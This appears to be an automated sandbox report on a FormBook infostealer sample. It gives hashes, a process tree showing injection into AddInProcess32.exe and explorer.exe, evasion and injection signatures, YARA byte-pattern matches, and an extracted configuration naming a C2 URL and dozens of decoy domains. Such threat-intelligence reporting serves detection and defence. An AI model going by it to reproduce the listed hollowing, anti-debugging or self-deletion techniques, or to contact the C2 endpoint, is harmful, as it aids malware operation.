Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.Trojan.Packed2.43183.29557.7257

Overview

General Information

Sample Name:	SecuriteInfo.com.Trojan.Packed2.43183.29557.7257 (renamed file extension from 7257 to exe)
Analysis ID:	432683
MD5:	4e9095ceadd56bc68a99947ab929f691
SHA1:	bce676ea49fb6709dc0e9a23df2e918e05b4074b
SHA256:	1fe427cfa805bbabdc371ae3f6ccea4088ca76e8b9fce9828a74885d72339020
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

.NET source code contains very large array initializations

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to launch a process as a different user

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Trojan.Packed2.43183.29557.exe (PID: 6916 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe' MD5: 4E9095CEADD56BC68A99947AB929F691)

AddInProcess32.exe (PID: 6200 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

systray.exe (PID: 2108 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)

cmd.exe (PID: 4812 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.roamallday.com/sadn/"], "decoy": ["blessonschool.com", "lydialondon.com", "evln.xyz", "mychallengeiam.com", "stealthshop.net", "amybrownwhiteconsulting.info", "pakistanwholesaler.com", "authenticcase.com", "timothymaina.com", "kiem-etre.com", "thslot39.com", "tripprivee.com", "timeforbusinessblog.xyz", "afgecouncil100.com", "automotivesupplierdc.com", "thebigfoottheory.com", "resocoin.com", "healthepartner.com", "kkrazzybazar.com", "stgwxq.com", "tech4thelolo.com", "smshare2u.com", "mow-it-now.com", "seemymiamihome.com", "urbanadultstore.com", "tmvh8.com", "livelifelocalpublications.com", "blaxies3.com", "hotlab.info", "axmpjbwqh.icu", "lileshop.com", "genariofficial.com", "vibeofthetribe.com", "tldyyl.com", "dapurbuageung.com", "murrayburngundogs.com", "hertsandlondonknee.com", "mcfarline.com", "chicskr.com", "producepatties.com", "026lw.com", "humblehomeus.com", "accukoopje.com", "tantnewsgarre.website", "okettnet.net", "mattwilborne.info", "granthamrobotics.com", "theinfluenceprogram.net", "pointmortgageservicing.com", "garantiservice.com", "bossesbuildbusinesscredit.com", "oselsoft.xyz", "lareleverh.com", "mirzaissa-realtor.com", "tourneyphotos.com", "handpickednurse.com", "guiaconservador.com", "theliftquotient.com", "linkalto.com", "cosmoandcocrafts.com", "wzcp09.com", "mclpay.com", "jobjiihnb.club", "sudesheranga.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8190:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x851a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1422d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13d19:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1432f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x144a7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x8f32:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12f94:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9caa:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1931f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a3c2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16251:$sqlite3step: 68 34 1C 7B E1 0x16364:$sqlite3step: 68 34 1C 7B E1 0x16280:$sqlite3text: 68 38 2A 90 C5 0x163a5:$sqlite3text: 68 38 2A 90 C5 0x16293:$sqlite3blob: 68 53 D8 7F 8C 0x163bb:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x31342:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x316cc:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x59622:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x599ac:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x818f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x81c7c:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3d3df:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x656bf:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x8d98f:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x3cecb:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x651ab:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x8d47b:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x3d4e1:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x657c1:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8da91:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x3d659:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x65939:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x8dc09:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x320e4:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x5a3c4:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x82694:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x3f403:$sqlite3step: 68 34 1C 7B E1 0x3f516:$sqlite3step: 68 34 1C 7B E1 0x676e3:$sqlite3step: 68 34 1C 7B E1 0x677f6:$sqlite3step: 68 34 1C 7B E1 0x8f9b3:$sqlite3step: 68 34 1C 7B E1 0x8fac6:$sqlite3step: 68 34 1C 7B E1 0x3f432:$sqlite3text: 68 38 2A 90 C5 0x3f557:$sqlite3text: 68 38 2A 90 C5 0x67712:$sqlite3text: 68 38 2A 90 C5 0x67837:$sqlite3text: 68 38 2A 90 C5 0x8f9e2:$sqlite3text: 68 38 2A 90 C5 0x8fb07:$sqlite3text: 68 38 2A 90 C5 0x3f445:$sqlite3blob: 68 53 D8 7F 8C 0x3f56d:$sqlite3blob: 68 53 D8 7F 8C 0x67725:$sqlite3blob: 68 53 D8 7F 8C 0x6784d:$sqlite3blob: 68 53 D8 7F 8C 0x8f9f5:$sqlite3blob: 68 53 D8 7F 8C 0x8fb1d:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8e72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x91fc:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x31130:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x314ba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14f0f:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x3d1cd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x149fb:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x3ccb9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15011:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x3d2cf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15189:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x3d447:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9c14:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x31ed2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x13c76:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x3bf34:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa98c:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x32c4a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a001:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x422bf:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b0a4:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16f33:$sqlite3step: 68 34 1C 7B E1 0x17046:$sqlite3step: 68 34 1C 7B E1 0x3f1f1:$sqlite3step: 68 34 1C 7B E1 0x3f304:$sqlite3step: 68 34 1C 7B E1 0x16f62:$sqlite3text: 68 38 2A 90 C5 0x17087:$sqlite3text: 68 38 2A 90 C5 0x3f220:$sqlite3text: 68 38 2A 90 C5 0x3f345:$sqlite3text: 68 38 2A 90 C5 0x16f75:$sqlite3blob: 68 53 D8 7F 8C 0x1709d:$sqlite3blob: 68 53 D8 7F 8C 0x3f233:$sqlite3blob: 68 53 D8 7F 8C 0x3f35b:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 22 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.0.AddInProcess32.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
11.0.AddInProcess32.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
11.0.AddInProcess32.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158a9:$sqlite3step: 68 34 1C 7B E1 0x159bc:$sqlite3step: 68 34 1C 7B E1 0x158d8:$sqlite3text: 68 38 2A 90 C5 0x159fd:$sqlite3text: 68 38 2A 90 C5 0x158eb:$sqlite3blob: 68 53 D8 7F 8C 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
11.2.AddInProcess32.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
11.2.AddInProcess32.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
11.2.AddInProcess32.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
11.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
11.2.AddInProcess32.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
11.2.AddInProcess32.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158a9:$sqlite3step: 68 34 1C 7B E1 0x159bc:$sqlite3step: 68 34 1C 7B E1 0x158d8:$sqlite3text: 68 38 2A 90 C5 0x159fd:$sqlite3text: 68 38 2A 90 C5 0x158eb:$sqlite3blob: 68 53 D8 7F 8C 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
11.0.AddInProcess32.exe.400000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
11.0.AddInProcess32.exe.400000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
11.0.AddInProcess32.exe.400000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 7 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.roamallday.com/sadn/"], "decoy": ["blessonschool.com", "lydialondon.com", "evln.xyz", "mychallengeiam.com", "stealthshop.net", "amybrownwhiteconsulting.info", "pakistanwholesaler.com", "authenticcase.com", "timothymaina.com", "kiem-etre.com", "thslot39.com", "tripprivee.com", "timeforbusinessblog.xyz", "afgecouncil100.com", "automotivesupplierdc.com", "thebigfoottheory.com", "resocoin.com", "healthepartner.com", "kkrazzybazar.com", "stgwxq.com", "tech4thelolo.com", "smshare2u.com", "mow-it-now.com", "seemymiamihome.com", "urbanadultstore.com", "tmvh8.com", "livelifelocalpublications.com", "blaxies3.com", "hotlab.info", "axmpjbwqh.icu", "lileshop.com", "genariofficial.com", "vibeofthetribe.com", "tldyyl.com", "dapurbuageung.com", "murrayburngundogs.com", "hertsandlondonknee.com", "mcfarline.com", "chicskr.com", "producepatties.com", "026lw.com", "humblehomeus.com", "accukoopje.com", "tantnewsgarre.website", "okettnet.net", "mattwilborne.info", "granthamrobotics.com", "theinfluenceprogram.net", "pointmortgageservicing.com", "garantiservice.com", "bossesbuildbusinesscredit.com", "oselsoft.xyz", "lareleverh.com", "mirzaissa-realtor.com", "tourneyphotos.com", "handpickednurse.com", "guiaconservador.com", "theliftquotient.com", "linkalto.com", "cosmoandcocrafts.com", "wzcp09.com", "mclpay.com", "jobjiihnb.club", "sudesheranga.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	Virustotal: Detection: 33%			Perma Link
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe	ReversingLabs: Detection: 36%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, type: MEMORY
